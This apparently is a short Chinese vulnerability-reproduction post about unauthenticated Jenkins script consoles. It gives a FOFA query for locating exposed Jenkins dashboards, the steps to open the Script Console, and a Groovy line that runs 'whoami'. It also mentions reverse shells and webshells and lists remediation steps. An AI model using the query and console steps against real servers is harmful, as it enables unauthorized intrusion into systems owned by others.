jenkins未授权访问漏洞——漏洞复现
jenkins未授权访问漏洞
1-漏洞描述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
2-漏洞复现
fofa语法搜索:
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2-打开url,点击manage jenkins

选择Script Console

3-执行命令
println "whoami" .execute().text

4-漏洞修复
1、禁止把Jenkins直接暴露在公网
2、添加认证,设置强密码复杂度及账号锁定。

浙公网安备 33010602011771号